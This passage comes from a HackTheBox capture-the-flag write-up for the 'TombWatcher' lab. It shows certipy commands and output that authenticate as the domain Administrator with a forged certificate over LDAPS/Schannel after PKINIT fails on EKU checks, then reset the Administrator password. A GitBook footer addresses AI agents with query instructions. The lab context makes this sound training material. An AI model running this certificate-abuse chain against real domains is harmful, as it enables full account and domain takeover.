[*] Certificate identities:
[*]     SAN UPN: 'administrator@tombwatcher.htb'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[-] Certificate is not valid for client authentication
[-] Check the certificate template and ensure it has the correct EKU(s)
[-] If you recently changed the certificate template, wait a few minutes for the change to propagate
[-] See the wiki for more information
```

Go Error, The EKU flag name is slightly different in certipy v5.

The EKU isn't being embedded properly, lets try using `schannel` authentication method.

**Normal `certipy auth`** uses **PKINIT** — a Kerberos extension that requires the certificate to have the **Client Authentication EKU** explicitly set. The WebServer template only has `Server Authentication` EKU, so Kerberos rejected it.

* **`ldap-shell`** uses **Schannel** (TLS certificate authentication) over **LDAPS (port 636)** instead of Kerberos. Schannel doesn't care about EKUs the same way — it just needs:
* A valid certificate signed by a trusted CA
* The SAN UPN mapping to a valid AD account
* The object SID matching the account

```bash
┌──(ajay㉿kali)-[~]
└─$ certipy auth -pfx 'administrator.pfx'   -dc-ip 10.129.232.167   -domain 'tombwatcher.htb'   -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@tombwatcher.htb'
[*]     SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*]     Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.232.167:636'
[*] Authenticated to '10.129.232.167' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
```

```bash
 change_password administrator Password123!
 
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Password123!
Password changed successfully!

# 

```

changing the password for the administrator user

Using the new creds got the shell.

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6fKreigXjWCWRDhj5OJg%2Fimage.png?alt=media&amp;token=15c02a9a-2589-41b2-86b4-59195c672ed1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-tombwatcher.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
